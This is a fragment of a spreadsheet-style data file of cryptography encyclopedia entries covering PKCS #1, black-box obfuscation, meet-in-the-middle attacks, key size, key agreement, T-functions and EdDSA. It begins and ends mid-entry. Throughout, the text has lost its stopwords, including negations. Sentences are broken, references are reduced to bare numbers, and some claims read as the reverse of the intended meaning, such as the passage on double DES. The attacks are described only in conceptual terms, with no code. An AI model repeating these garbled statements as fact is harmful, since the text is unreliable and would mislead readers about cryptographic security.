method signature appendix, probabilistic signature scheme. emsa-pkcs1-v1_5: encoding method signature appendix first standardized version pkcs #1.the signature schemes actually signatures appendix, means rather signing input data directly, hash function used first produce intermediary representation data, result hash signed. this technique almost always used amount data directly signed proportional size keys; almost always much smaller amount data application wish sign. version history versions 1.1–1.3, february march 1991, privately distributed. version 1.4, june 1991, published nist/osi implementors' workshop. version 1.5, november 1993. first public publication. republished 2313. version 2.0, september 1998. republished 2437. introduced rsaep-oaep encryption scheme. version 2.1, june 2002. republished 3447. introduced multi-prime rsassa-pss signature scheme version 2.2, october 2012. republished 8017. implementations below list cryptography libraries provide support pkcs#1: botan bouncy castle bsafe cryptlib crypto++ libgcrypt mbed nettle openssl wolfcrypt attacks multiple attacks discovered pkcs v1.5.in 1998, daniel bleichenbacher published seminal paper became known bleichenbacher's attack (also known "million message attack"). pkcs subsequently updated release patches issued users wishing continue using version standard. with slight variations vulnerability still exists many modern servers.in 2006, bleichenbacher presented forgery attack signature scheme rsassa-pkcs1-v1_5. also comparison cryptography libraries references external links 8017 pkcs cryptography specifications version pkcs v2.2: cryptography standard wayback machine (archived april 2016) raising standard signatures: rsa-pss wayback machine (archived 2004-04-04)</t>
  </si>
  <si>
    <t>Black-box obfuscation</t>
  </si>
  <si>
    <t>cryptography, black-box obfuscation proposed cryptographic primitive would allow computer program obfuscated impossible determine anything except input output behavior. black-box obfuscation proven impossible, even principle. impossibility unobfuscatable programs barak constructed family unobfuscatable programs, efficient attacker always learn obfuscated code black-box access.broadly, start engineering special pair programs cannot obfuscated together. randomly selected strings {\displaystyle \alpha ,\beta fixed, pre-determined length {\displaystyle define program computes otherwise {\displaystyle c_{\alpha ,\beta }(x):={\begin{cases}\beta &amp;{\text{if }}x=\alpha \\0&amp;{\text{otherwise}}\end{cases}}} program computes runs time poly otherwise {\displaystyle d_{\alpha ,\beta }(x):={\begin{cases}1&amp;{\text{if }}x(\alpha )=\beta {\text{ }}x{\text{ runs time}}\leq {\text{poly}}(k)\\0&amp;{\text{otherwise}}\end{cases}}.} (here, {\displaystyle d_{\alpha ,\beta interprets input code turing machine. second condition definition {\displaystyle d_{\alpha ,\beta prevent function uncomputable.) efficient attacker black-box access, barak argued, attacker exponentially small chance guessing password {\displaystyle \alpha cannot distinguish pair programs pair {\displaystyle c_{\alpha ,\beta replaced program {\displaystyle always outputs "0". however, attacker access obfuscated implementations {\displaystyle c'_{\alpha ,\beta },d'_{\alpha ,\beta {\displaystyle c_{\alpha ,\beta },d_{\alpha ,\beta attacker find {\displaystyle d'_{\alpha ,\beta }(c'_{\alpha ,\beta })=1} probability whereas attacker always find {\displaystyle d'_{\alpha ,\beta }(z)=0} unless {\displaystyle \beta (which happen negligible probability). this means attacker always distinguish pair {\displaystyle (c'_{\alpha ,\beta },d'_{\alpha ,\beta pair {\displaystyle (z,d'_{\alpha ,\beta obfuscated code access, black-box access. since obfuscator prevent attack, barak conclude black-box obfuscator pairs programs exists.to conclude argument, barak define third program implement functionality previous: {\displaystyle f_{\alpha ,\beta }(b,x):={\begin{cases}c_{\alpha ,\beta }(x)&amp;{\text{if }}b=0\\d_{\alpha ,\beta }(x)&amp;{\text{if }}b=1\\\end{cases}}.} since equivalently efficient implementations {\displaystyle c_{\alpha ,\beta },d_{\alpha ,\beta recovered {\displaystyle f_{\alpha ,\beta hardwiring value {\displaystyle barak conclude {\displaystyle f_{\alpha ,\beta cannot obfuscated either, concludes argument. impossible variants black-box obfuscation types unobfuscable programs paper, barak also prove following (conditional appropriate cryptographic assumptions): there unobfuscatable circuits. there black-box approximate obfuscator. there unobfuscatable, secure, probabilistic private-key cryptosystems. there unobfuscatable, secure, deterministic digital signature schemes. there unobfuscatable, secure, deterministic message authentication schemes. there unobfuscatable, secure pseudorandom functions. many protocols secure random oracle model, protocol becomes insecure random oracle replaced artificial cryptographic hash function; particular, fiat-shamir schemes attacked. there unobfuscatable circuits (that constant-depth threshold circuits). there unobfuscatable sampling algorithms fact, cannot obfuscated approximately). there secure software watermarking scheme. weaker variants original paper exploring black-box obfuscation, barak defined weaker notions cryptographic obfuscation rule out: indistinguishability obfuscation extractability obfuscation (which called "differing-inputs obfuscation".) informally, indistinguishability obfuscator convert input programs functionality output programs outputs cannot efficiently related inputs bounded attacker, extractability obfuscator obfuscator efficient attacker could relate outputs inputs programs, attacker could also produce input programs obfuscated produce different outputs. (note extractability obfuscator necessarily indistinguishability obfuscator.) 2020, candidate implementation indistinguishability obfuscation investigation. 2013, boyle explored several candidate implementations extractability obfuscation. references</t>
  </si>
  <si>
    <t>Meet-in-the-middle attack</t>
  </si>
  <si>
    <t>meet-in-the-middle attack (mitm), known plaintext attack, generic space–time tradeoff cryptographic attack encryption schemes rely performing multiple encryption operations sequence. mitm attack primary reason double used triple (168-bit) bruteforced attacker space 2112 operations. description when trying improve security block cipher, tempting idea encrypt data several times using multiple keys. might think doubles even n-tuples security multiple-encryption scheme, depending number times data encrypted, exhaustive search possible combinations keys (simple brute-force) would take 2n·k attempts data encrypted k-bit keys times. mitm generic attack weakens security benefits using multiple encryptions storing intermediate values encryptions decryptions using improve time required brute force decryption keys. this makes meet-in-the-middle attack (mitm) generic space–time tradeoff cryptographic attack. mitm attack attempts find keys using range (ciphertext) domain (plaintext) composition several functions block ciphers) forward mapping first functions backward mapping (inverse image) last functions, quite literally meeting middle composed function. example, although double encrypts data different 56-bit keys, double broken encryption decryption operations. multidimensional mitm (md-mitm) uses combination several simultaneous mitm attacks like described above, meeting happens multiple positions composed function. history diffie hellman first proposed meet-in-the-middle attack hypothetical expansion block cipher 1977. their attack used space–time tradeoff break double-encryption scheme twice time needed break single-encryption scheme. 2011, guang gong investigated multidimensional meet-in-the-middle attack presented attacks block ciphers gost, ktantan hummingbird-2. meet-in-the-middle (1d-mitm) assume someone wants attack encryption scheme following characteristics given plaintext ciphertext {\displaystyle {\begin{aligned}c&amp;={\mathit {enc}}_{k_{2}}({\mathit {enc}}_{k_{1}}(p))\\p&amp;={\mathit {dec}}_{k_{1}}({\mathit {dec}}_{k_{2}}(c))\\\end{aligned}}} encryption function, decryption function defined enc−1 (inverse mapping) keys. naive approach brute-forcing encryption scheme decrypt ciphertext every possible decrypt intermediate outputs every possible total 2|k1| 2|k2| 2|k1|+|k2|) operations. meet-in-the-middle attack uses efficient approach. decrypting obtains following equivalence: {\displaystyle {\begin{aligned}c&amp;={\mathit {enc}}_{k_{2}}({\mathit {enc}}_{k_{1}}(p))\\{\mathit {dec}}_{k_{2}}(c)&amp;={\mathit {dec}}_{k_{2}}({\mathit {enc}}_{k_{2}}[{\mathit {enc}}_{k_{1}}(p)])\\{\mathit {dec}}_{k_{2}}(c)&amp;={\mathit {enc}}_{k_{1}}(p)\\\end{aligned}}} attacker compute enck1(p) values deck2(c) possible values total 2|k1| 2|k2| 2|k1|+1, size) operations. result enck1(p) operations matches result deck2(c) operations, pair possibly correct key. this potentially-correct called candidate key. attacker determine candidate correct testing second test-set plaintext ciphertext. mitm attack reasons data encryption standard (des) replaced triple double des. attacker mitm attack bruteforce double operations space, making small improvement des. triple uses "triple length" (168-bit) also vulnerable meet-in-the-middle attack space 2112 operations, considered secure size keyspace. mitm algorithm compute following: {\displaystyle {\mathit {subcipher}}_{1}={\mathit {enc}}_{f_{1}}(k_{f_{1}},p),\;\forall k_{f_{1}}\in save {\displaystyle {\mathit {subcipher}}_{1}} together corresponding {\displaystyle k_{f_{1}}} {\displaystyle {\mathit {subcipher}}_{1}={\mathit {dec}}_{b_{1}}(k_{b_{1}},c),\;\forall k_{b_{1}}\in compare {\displaystyle {\mathit {subcipher}}_{1}} awhen match found, keep {\displaystyle k_{f_{1}},k_{b_{1}}} candidate key-pair table test pairs pair {\displaystyle (p,c)} confirm validity. key-pair work pair, mitm pair {\displaystyle (p,c)} mitm complexity keysize attack uses 2k+1 encryptions (and decryptions) o(2k) memory store results forward computations lookup table, contrast naive attack, needs 22·k encryptions o(1) space. multidimensional mitm (md-mitm) while 1d-mitm efficient, sophisticated attack developed: multidimensional meet-in-the-middle attack, also abbreviated md-mitm. this preferred data encrypted using encryptions different keys. instead meeting middle (one place sequence), md-mitm attack attempts reach several specific intermediate states using forward backward computations several positions cipher.assume attack mounted block cipher, encryption decryption defined before: {\displaystyle c={\mathit {enc}}_{k_{n}}({\mathit {enc}}_{k_{n-1}}(...({\mathit {enc}}_{k_{1}}(p))...))} {\displaystyle p={\mathit {dec}}_{k_{1}}({\mathit {dec}}_{k_{2}}(...({\mathit {dec}}_{k_{n}}(c))...))} plaintext encrypted multiple times using repetition block cipher md-mitm used cryptanalysis among many, gost block cipher, shown 3d-mitm significantly reduced time complexity attack md-mitm algorithm compute following: {\displaystyle {\mathit {subcipher}}_{1}={\mathit {enc}}_{f_{1}}(k_{f_{1}},p)\qquad \forall k_{f_{1}}\in save {\displaystyle {\mathit {subcipher}}_{1}} together corresponding {\displaystyle k_{f_{1}}} {\displaystyle h_{1}} {\displaystyle {\mathit {subcipher}}_{n+1}={\mathit {dec}}_{b_{n+1}}(k_{b_{n+1}},c)\qquad \forall k_{b_{n+1}}\in save {\displaystyle {\mathit {subcipher}}_{n+1}} together corresponding {\displaystyle k_{b_{n+1}}} {\displaystyle h_{n+1}} .for possible guess intermediate state {\displaystyle s_{1}} compute following: {\displaystyle {\mathit {subcipher}}_{1}={\mathit {dec}}_{b_{1}}(k_{b_{1}},s_{1})\qquad \forall k_{b_{1}}\in match {\displaystyle {\mathit {subcipher}}_{1}} {\displaystyle h_{1}} save {\displaystyle k_{b_{1}}} {\displaystyle k_{f_{1}}} {\displaystyle t_{1}} {\displaystyle {\mathit {subcipher}}_{2}={\mathit {enc}}_{f_{2}}(k_{f_{2}},s_{1})\qquad \forall k_{f_{2}}\in save {\displaystyle {\mathit {subcipher}}_{2}} together corresponding {\displaystyle k_{f_{2}}} {\displaystyle h_{2}} possible guess intermediate state {\displaystyle s_{2}} compute following: {\displaystyle {\mathit {subcipher}}_{2}={\mathit {dec}}_{b_{2}}(k_{b_{2}},s_{2})\qquad \forall k_{b_{2}}\in match {\displaystyle {\mathit {subcipher}}_{2}} {\displaystyle h_{2}} check also whether matches {\displaystyle t_{1}} save combination sub-keys together {\displaystyle t_{2}} possible guess intermediate state {\displaystyle s_{n}} compute following: found combination sub-keys {\displaystyle (k_{f_{1}},k_{b_{1}},k_{f_{2}},k_{b_{2}},...,k_{f_{n+1}},k_{b_{n+1}})} another pair plaintext/ciphertext verify correctness key. note nested element algorithm. guess every possible value done guess previous sj-1. this make element exponential complexity overall time complexity md-mitm attack. md-mitm complexity time complexity attack without brute force, {\displaystyle 2^{|k_{f_{1}}|}+2^{|k_{b_{n+1}}|}+2^{|s_{1}|}} {\displaystyle (2^{|k_{b_{1}}|}+2^{|k_{f_{2}}|}+2^{|s_{2}|}} {\displaystyle (2^{|k_{b_{2}}|}+2^{|k_{f_{3}}|}+\cdots regarding memory complexity, easy {\displaystyle t_{2},t_{3},...,t_{n}} much smaller first built table candidate values: {\displaystyle t_{1}} increases, candidate values contained {\displaystyle t_{i}} must satisfy conditions thereby fewer candidates pass destination {\displaystyle t_{n}} upper bound memory complexity md-mitm {\displaystyle 2^{|k_{f_{1}}|}+2^{|k_{b_{n+1}}|}+2^{|k|-|s_{n}|}\cdots denotes length whole (combined). data complexity depends probability wrong pass (obtain false positive), {\displaystyle 1/2^{|l|}} intermediate state first mitm phase. size intermediate state block size often same! considering also many keys left testing first mitm-phase, {\displaystyle 2^{|k|}/2^{|l|}} therefore, first mitm phase, {\displaystyle 2^{|k|-b}\cdot 2^{-b}=2^{|k|-2b}} {\displaystyle |b|} block size. time final candidate value keys tested plaintext/ciphertext-pair, number keys pass multiplied probability pass {\displaystyle 1/2^{|b|}} part brute force testing (testing candidate {\displaystyle (p,c)} -pairs, time complexity {\displaystyle 2^{|k|-b}+2^{|k|-2b}+2^{|k|-3b}+2^{|k|-4b}\cdots clearly increasing multiples exponent, number tends zero. conclusion data complexity similar reasoning restricted around {\displaystyle \lceil |k|/n\rceil {\displaystyle (p,c)} -pairs. below specific example 2d-mitm mounted: general example 2d-mitm this general description 2d-mitm mounted block cipher encryption. two-dimensional mitm (2d-mitm) method reach intermediate states inside multiple encryption plaintext. figure: 2d-mitm algorithm compute following: {\displaystyle {\mathit {subcipher}}_{1}={\mathit {enc}}_{f_{1}}(k_{f_{1}},p)\qquad \forall k_{f_{1}}\in save {\displaystyle {\mathit {subcipher}}_{1}} together corresponding {\displaystyle k_{f_{1}}} {\displaystyle {\mathit {subcipher}}_{2}={\mathit {dec}}_{b_{2}}(k_{b_{2}},c)\qquad \forall k_{b_{2}}\in save {\displaystyle {\mathit {subcipher}}_{2}} together corresponding {\displaystyle k_{b_{2}}} b.for possible guess intermediate state {\displaystyle {\mathit {subcipher}}_{1}} {\displaystyle {\mathit {subcipher}}_{2}} compute following: {\displaystyle {\mathit {subcipher}}_{1}={\mathit {dec}}_{b_{1}}(k_{b_{1}},s)\qquad \forall k_{b_{1}}\in match {\displaystyle {\mathit {subcipher}}_{1}} save {\displaystyle k_{b_{1}}} {\displaystyle k_{f_{1}}} {\displaystyle {\mathit {subcipher}}_{2}={\mathit {enc}}_{f_{2}}(k_{f_{2}},s)\qquad \forall k_{f_{2}}\in match {\displaystyle {\mathit {subcipher}}_{2}} check also whether matches case then:use found combination sub-keys {\displaystyle (k_{f_{1}},k_{b_{1}},k_{f_{2}},k_{b_{2}})} another pair plaintext/ciphertext verify correctness key. 2d-mitm complexity time complexity attack without brute force, {\displaystyle 2^{|k_{f_{1}}|}+2^{|k_{b_{2}}|}+2^{|s|}\cdot \left(2^{|k_{b_{1}}|}+2^{|k_{f_{2}}|}\right)} denotes length. main memory consumption restricted construction sets much smaller others. data complexity subsection complexity md-mitm. also birthday attack wireless security cryptography 3-subset meet-in-the-middle attack partial-matching meet-in-the-middle attack references</t>
  </si>
  <si>
    <t>EXIT chart</t>
  </si>
  <si>
    <t>extrinsic information transfer chart, commonly called exit chart, technique construction good iteratively-decoded error-correcting codes particular low-density parity-check (ldpc) codes turbo codes). exit charts developed stephan brink, building concept extrinsic information developed turbo coding community. exit chart includes response elements decoder (for example convolutional decoder turbo code, ldpc parity-check nodes ldpc variable nodes). response either seen extrinsic information representation messages belief propagation. components exchange messages, behaviour decoder plotted two-dimensional chart. component plotted input horizontal axis output vertical axis. component plotted input vertical axis output horizontal axis. decoding path followed found stepping curves. successful decoding, must clear swath curves iterative decoding proceed bits extrinsic information extrinsic information. assumption messages element decoder described single number, extrinsic information. this true decoding codes binary erasure channel otherwise messages often samples gaussian distribution correct extrinsic information. assumption messages independent (equivalent infinite block-size code without local structure components) make optimal code, transfer curves need close other. this observation supported theoretical result capacity reached code binary-erasure channel must area curves also insight large number iterations required information spread throughout bits code. references richardson urbanke: "modern coding theory" isbn 0-521-85229-3 external links lecture notes exit charts(pdf)</t>
  </si>
  <si>
    <t>Key size</t>
  </si>
  <si>
    <t>cryptography, size, length, space refer number bits used cryptographic algorithm (such cipher). length defines upper-bound algorithm's security (i.e. logarithmic measure fastest known attack algorithm), since security algorithms violated brute-force attacks. ideally, lower-bound algorithm's security design equal length (that security determined entirely keylength, words, algorithm's design detract degree security inherent length). indeed, symmetric-key algorithms designed security equal length. however, design, attack might discovered. instance, triple designed 168-bit key, attack complexity 2112 known (i.e. triple bits security, bits attack rendered 'ineffective' towards security). nevertheless, long security (understood "the amount effort would take gain access") sufficient particular application, matter length security coincide. this important asymmetric-key algorithms, algorithm known satisfy property; elliptic curve cryptography comes closest effective security roughly half length. significance keys used control operation cipher correct convert encrypted text (ciphertext) plaintext. many ciphers actually based publicly known algorithms open source difficulty obtaining determines security system, provided analytic attack (i.e. "structural weakness" algorithms protocols used), assuming otherwise available (such theft, extortion, compromise computer systems). widely accepted notion security system depend alone explicitly formulated auguste kerckhoffs 1880s) claude shannon 1940s); statements known kerckhoffs' principle shannon's maxim respectively. should, therefore, large enough brute-force attack (possible encryption algorithm) infeasible i.e. would take long execute. shannon's work information theory showed achieve so-called 'perfect secrecy', length must least large message used (this algorithm called one-time pad). light this, practical difficulty managing long keys, modern cryptographic practice discarded notion perfect secrecy requirement encryption, instead focuses computational security, computational requirements breaking encrypted text must infeasible attacker. size encryption system encryption systems often grouped families. common families include symmetric systems (e.g. aes) asymmetric systems (e.g. rsa); alternatively grouped according central algorithm used (e.g. elliptic curve cryptography). different level cryptographic complexity, usual different sizes level security, depending upon algorithm used. example, security available 1024-bit using asymmetric considered approximately equal security 80-bit symmetric algorithm.the actual degree security achieved time varies, computational power powerful mathematical analytic methods become available. reason, cryptologists tend look indicators algorithm length shows signs potential vulnerability, move longer sizes difficult algorithms. example, 2007, 1039-bit integer factored special number field sieve using computers months. factored number special form; special number field sieve cannot used keys. computation roughly equivalent breaking key. however, might advance warning 1024 used secure online commerce deprecated, since become breakable near future. cryptography professor arjen lenstra observed "last time, took nine years generalize special nonspecial, hard-to-factor number" asked whether 1024-bit keys dead, said: "the answer question unqualified yes."the 2015 logjam attack revealed additional dangers using diffie-hellman exchange common 1024-bit smaller prime moduli use. this common practice allows large amounts communications compromised expense attacking small number primes. brute-force attack even symmetric cipher currently unbreakable exploiting structural weaknesses algorithm, possible entire space keys known brute-force attack. since longer symmetric keys require exponentially work brute force search, sufficiently long symmetric makes line attack impractical. with length bits, possible keys. this number grows rapidly increases. large number operations (2128) required possible 128-bit keys widely considered reach conventional digital computing techniques foreseeable future. however, experts anticipate alternative computing technologies processing power superior current computer technology. suitably sized quantum computer capable running grover's algorithm reliably becomes available, would reduce 128-bit 64-bit security, roughly equivalent. this reasons supports 256-bit length. symmetric algorithm lengths government export policy long restricted "strength" cryptography sent country. many years limit bits. today, length bits offers little protection even casual attacker single response, year 2000, major restrictions strong encryption relaxed. however, regulations removed, encryption registration u.s. bureau industry security still required export "mass market encryption commodities, software components encryption exceeding bits" 36494). ibm's lucifer cipher selected 1974 base would become data encryption standard. lucifer's length reduced bits bits, nist argued sufficient. major computing resources large budget; cryptographers including whitfield diffie martin hellman complained made cipher weak computers would able break brute force parallel computing. disputed this, claiming brute-forcing would take "something like years". however, late 90s, became clear could cracked days' time-frame custom-built hardware could purchased large corporation government. book cracking (o'reilly associates) tells successful attempt 1998 break 56-bit brute-force attack mounted cyber civil rights group limited resources; cracker. even demonstration, bits considered insufficient length symmetric algorithm keys; replaced many applications triple des, bits security used 168-bit keys (triple key). 2002, distributed.net volunteers broke 64-bit several years effort, using seventy thousand (mostly home) computers. advanced encryption standard published 2001 uses sizes 128, bits. many observers consider bits sufficient foreseeable future symmetric algorithms aes's quality quantum computers become available. however, 2015, u.s. national security agency issued guidance plans switch quantum computing resistant algorithms requires 256-bit keys data classified secret.in 2003, u.s. national institute standards technology, nist proposed phasing 80-bit keys 2015. 2005, 80-bit keys allowed 2010.since 2015, nist guidance says "the keys provide less bits security strength agreement disallowed." nist approved symmetric encryption algorithms include three-key triple des, aes. approvals two-key triple skipjack withdrawn 2015; nsa's skipjack algorithm used fortezza program employs 80-bit keys. asymmetric algorithm lengths effectiveness public cryptosystems depends intractability (computational theoretical) certain mathematical problems integer factorization. these problems time-consuming solve, usually faster trying possible keys brute force. thus, asymmetric keys must longer equivalent resistance attack symmetric algorithm keys. common methods assumed weak sufficiently powerful quantum computers future. since 2015, nist recommends minimum 2048-bit keys rsa, update widely-accepted recommendation 1024-bit minimum since least 2002.1024-bit keys equivalent strength 80-bit symmetric keys, 2048-bit keys 112-bit symmetric keys, 3072-bit keys 128-bit symmetric keys, 15360-bit keys 256-bit symmetric keys. 2003, security claimed 1024-bit keys likely become crackable time 2006 2010, 2048-bit keys sufficient 2030. 2020 largest publicly known cracked rsa-250 bits.the finite field diffie-hellman algorithm roughly strength sizes. work factor breaking diffie-hellman based discrete logarithm problem, related integer factorization problem rsa's strength based. thus, 2048-bit diffie-hellman strength 2048-bit key. elliptic-curve cryptography (ecc) alternative asymmetric algorithms equivalently secure shorter keys, requiring approximately twice bits equivalent symmetric algorithm. 256-bit ecdh approximately safety factor 128-bit key. message encrypted elliptic algorithm using 109-bit long broken 2004.the previously recommended 256-bit protecting classified information secret level, 384-bit secret; 2015 announced plans transition quantum-resistant algorithms 2024, recommends 384-bit classified information. effect quantum computing attacks strength best known quantum computing attacks based shor's algorithm grover's algorithm. two, shor's offers greater risk current security systems. derivatives shor's algorithm widely conjectured effective mainstream public-key algorithms including rsa, diffie-hellman elliptic curve cryptography. according professor gilles brassard, expert quantum computing: "the time needed factor integer order time needed integer modulus single encryption. words, takes time break quantum computer multiplicative constant) legitimately classical computer." general consensus public algorithms insecure size sufficiently large quantum computers capable running shor's algorithm become available. implication attack data encrypted using current standards based security systems ubiquitous used protect e-commerce internet banking used protect access sensitive computing systems risk. encrypted data protected using public-key algorithms archived broken later time, commonly known retroactive/retrospective decryption "harvest decrypt". mainstream symmetric ciphers (such twofish) collision resistant hash functions (such sha) widely conjectured offer greater security known quantum computing attacks. they widely thought vulnerable grover's algorithm. bennett, bernstein, brassard, vazirani proved 1996 brute-force search quantum computer cannot faster roughly 2n/2 invocations underlying cryptographic algorithm, compared roughly classical case. thus presence large quantum computers n-bit provide least bits security. quantum brute force easily defeated doubling length, little extra computational cost ordinary use. this implies least 256-bit symmetric required achieve 128-bit security rating quantum computer. mentioned above, announced 2015 plans transition quantum-resistant algorithms.according nsa: sufficiently large quantum computer, built, would capable undermining widely-deployed public algorithms used establishment digital signatures. generally accepted quantum computing techniques much less effective symmetric algorithms current widely used public algorithms. while public cryptography requires changes fundamental design protect potential future quantum computer, symmetric algorithms believed secure provided sufficiently large size used. longer term, looks nist identify broadly accepted, standardized suite commercial public algorithms vulnerable quantum attacks." 2016, nsa's commercial national security algorithm suite includes: also stretching notes references general recommendation management part general, nist special publication 800-57. march, 2007 blaze, matt; diffie, whitfield; rivest, ronald "minimal lengths symmetric ciphers provide adequate commercial security". january, 1996 arjen lenstra, eric verheul: selecting cryptographic sizes. cryptology 14(4): 255-293 (2001) citeseer link external links www.keylength.com: online keylength calculator articles discussing implications quantum computing nist cryptographic toolkit burt kaliski: twirl sizes (may 2003)</t>
  </si>
  <si>
    <t>Mechanical overload</t>
  </si>
  <si>
    <t>failure fracture product component result single event known mechanical overload. common failure mode. terms used forensic engineering structural engineering analysing product failure. failure occur either product weaker expected owing stress concentration, applied load greater expected exceeds normal tensile strength, shear strength compressive strength product. also forensic engineering stress analysis structural engineering references strength materials, edition, krieger publishing company, 1976, timoshenko s.,isbn 0-88275-420-3 forensic materials engineering: case studies peter rhys lewis, colin gagg, reynolds, press (2004).</t>
  </si>
  <si>
    <t>Key-agreement protocol</t>
  </si>
  <si>
    <t>cryptography, key-agreement protocol protocol whereby parties agree influence outcome. properly done, precludes undesired third parties forcing choice agreeing parties. protocols useful practice also reveal eavesdropping party agreed upon. many exchange systems party generate key, simply send party—the party influence key. using key-agreement protocol avoids distribution problems associated systems. protocols parties influence final derived implement perfect forward secrecy. exponential exchange first publicly known public-key agreement protocol meets criteria diffie–hellman exchange, parties jointly exponentiate generator random numbers, eavesdropper cannot feasibly determine resultant value used produce shared exponential exchange specify prior agreement subsequent authentication participants. thus described anonymous agreement protocol. authentication anonymous exchange, like diffie–hellman, provide authentication parties, thus vulnerable man-in-the-middle attacks. wide variety cryptographic authentication schemes protocols developed provide authenticated agreement prevent man-in-the-middle related attacks. these methods generally mathematically bind agreed agreed-upon data, following: public/private pairs shared secret keys passwords public keys widely used mechanism defeating attacks digitally signed keys must integrity-assured: bob's signed trusted third party vouching identity, alice considerable confidence signed receives attempt intercept eve. when alice public-key infrastructure, digitally sign agreed diffie–hellman key, exchanged diffie–hellman public keys. such signed keys, sometimes signed certificate authority, primary mechanisms used secure traffic (including https, transport layer security protocols). other specific examples mqv, isakmp component ipsec protocol suite securing internet protocol communications. however, systems require care endorsing match identity information public keys certificate authorities order work properly. hybrid systems hybrid systems public-key cryptography exchange secret keys, used symmetric-key cryptography systems. most practical applications cryptography combination cryptographic functions implement overall system provides four desirable features secure communications (confidentiality, integrity, authentication, non-repudiation). passwords password-authenticated agreement protocols require separate establishment password (which smaller key) manner private integrity-assured. these designed resist man-in-the-middle active attacks password established keys. example, dh-eke, speke, password-authenticated variations diffie–hellman. other tricks integrity-assured verify shared public channel, engage diffie–hellman exchange derive short-term shared key, subsequently authenticate keys match. voice-authenticated read-out key, pgpfone. voice authentication, however, presumes infeasible man-in-the-middle spoof participant's voice real-time, undesirable assumption. such protocols designed work even small public value, password. variations theme proposed bluetooth pairing protocols. attempt avoid using additional out-of-band authentication factors, davies price proposed interlock protocol rivest shamir, subject attack subsequent refinement. shared secret keys secret-key (symmetric) cryptography requires initial exchange shared manner private integrity-assured. when done right, man-in-the-middle attack prevented. however, without public-key cryptography, left undesirable key-management problems. also (cryptography) computer security cryptanalysis secure channel digital signature encapsulation management password-authenticated agreement interlock protocol zero-knowledge password proof neural cryptography#neural exchange protocol quantum distribution references</t>
  </si>
  <si>
    <t>T-function</t>
  </si>
  <si>
    <t>cryptography, t-function bijective mapping updates every state described {\displaystyle x_{i}'=x_{i}+f(x_{0},\cdots ,x_{i-1})} simple words update function state updated linear combination function subset less significant bits. every single less significant included update every state, t-function called triangular. thanks bijectivity collisions, therefore entropy loss) regardless used boolean functions regardless selection inputs long come side output bit), t-functions widely used cryptography construct block ciphers, stream ciphers, prngs hash functions. t-functions first proposed 2002 klimov shamir paper class invertible mappings". ciphers tsc-1, tsc-3, tsc-4, abc, mir-1 vest built different types t-functions. because arithmetic operations addition, subtraction multiplication also t-functions (triangular t-functions), software-efficient word-based t-functions constructed combining bitwise logic arithmetic operations. another important property t-functions based arithmetic operations predictability period, highly attractive cryptographers. although triangular t-functions naturally vulnerable guess-and-determine attacks, well chosen bitwise transpositions rounds neutralize imbalance. software-efficient ciphers, done interleaving arithmetic operations byte-swapping operations small degree bitwise rotation operations. however, triangular t-functions remain highly inefficient hardware. t-functions restrictions types widths update functions used bit. subsequent transposition output bits iteration t-function also affect bijectivity. this freedom allows designer choose update functions s-boxes satisfy cryptographic criteria even choose arbitrary key-dependent update functions (see family keying). hardware-efficient lightweight t-functions identical widths update functions state thus easily constructed. core accumulators vest ciphers good example reasonably light-weight t-functions balanced rounds transposition layer making 2-round feedback functions roughly width losing "t-function" bias depending less significant bits state. references klimov; shamir (2002). class invertible mappings" (pdf/postscript). cryptographic hardware embedded systems ches 2002. springer-verlag. lncs 2523: 470–483. klimov; shamir (2003). cryptographic applications t-functions (pdf/postscript). selected areas cryptography, 2003, lncs 3006. springer-verlag. 248–261. klimov; shamir (2004). cryptographic primitives based multiword t-functions. fast software encryption, 2004, lncs 3017. springer-verlag. 1–15. magnus daum (2005). "narrow t-functions" (pdf/postscript). fast software encryption. springer-verlag. lncs 3557: 50–67. hong; lee; yeom (2005). class single cycle t-functions. fast software encryption, 2005, lncs 3557. springer-verlag. 68–82. klimov shamir (2005). applications t-functions block ciphers hash functions. fast software encryption, 2005, lncs 3557. springer-verlag. 18–31. archived original (gzipped postscript) 2007-09-26.</t>
  </si>
  <si>
    <t>EdDSA</t>
  </si>
  <si>
    <t>public-key cryptography, edwards-curve digital signature algorithm (eddsa) digital signature scheme using variant schnorr signature based twisted edwards curves. designed faster existing digital signature schemes without sacrificing security. developed team including daniel bernstein, niels duif, tanja lange, peter schwabe, bo-yin yang. reference implementation public domain software. summary following simplified description eddsa, ignoring details encoding integers curve points strings; full details papers rfc.an eddsa signature scheme choice: finite field {\displaystyle \mathbb _{q}} prime power {\displaystyle elliptic curve {\displaystyle {\displaystyle \mathbb _{q}} whose group {\displaystyle e(\mathbb _{q})} {\displaystyle \mathbb _{q}} -rational points order {\displaystyle \#e(\mathbb _{q})=2^{c}\ell {\displaystyle \ell large prime {\displaystyle 2^{c}} called cofactor; base point {\displaystyle b\in e(\mathbb _{q})} order {\displaystyle \ell cryptographic hash function {\displaystyle {\displaystyle -bit outputs, {\displaystyle 2^{b-1}&gt;q} elements {\displaystyle \mathbb _{q}} curve points {\displaystyle e(\mathbb _{q})} represented strings {\displaystyle bits.these parameters common users eddsa signature scheme. security eddsa signature scheme depends critically choices parameters, except arbitrary choice base point—for example, pollard's algorithm logarithms expected take approximately {\displaystyle {\sqrt {\ell /4}}} curve additions compute discrete logarithm, {\displaystyle \ell must large enough infeasible, typically taken exceed 2200. choice {\displaystyle \ell limited choice {\displaystyle since hasse's theorem, {\displaystyle \#e(\mathbb _{q})=2^{c}\ell cannot differ {\displaystyle q+1} {\displaystyle 2{\sqrt {q}}} hash function {\displaystyle normally modelled random oracle formal analyses eddsa's security. hasheddsa variant, additional collision-resistant hash function {\displaystyle needed. within eddsa signature scheme, public eddsa public curve point {\displaystyle a\in e(\mathbb _{q})} encoded {\displaystyle bits. signature eddsa signature message {\displaystyle public {\displaystyle pair {\displaystyle (r,s)} encoded {\displaystyle bits, curve point {\displaystyle r\in e(\mathbb _{q})} integer {\displaystyle 0&lt;s&lt;\ell satisfying following verification equation. {\displaystyle \parallel denotes concatenation. private eddsa private {\displaystyle -bit string {\displaystyle chosen uniformly random. corresponding public {\displaystyle a=sb} {\displaystyle s=h_{0,\dots ,b-1}(k)} least significant {\displaystyle bits {\displaystyle h(k)} interpreted integer little-endian. signature message {\displaystyle {\displaystyle (r,s)} {\displaystyle r=rb} {\displaystyle r=h(h_{b,\dots ,2b-1}(k)\parallel this satisfies verification equation: ed25519 ed25519 eddsa signature scheme using sha-512 (sha-2) curve25519 {\displaystyle q=2^{255}-19,} {\displaystyle e/\mathbb _{q}} twisted edwards curve 27742317777372353535851937790883648493 {\displaystyle \ell =2^{252}+27742317777372353535851937790883648493} {\displaystyle c=3} {\displaystyle unique point {\displaystyle e(\mathbb _{q})} whose {\displaystyle coordinate 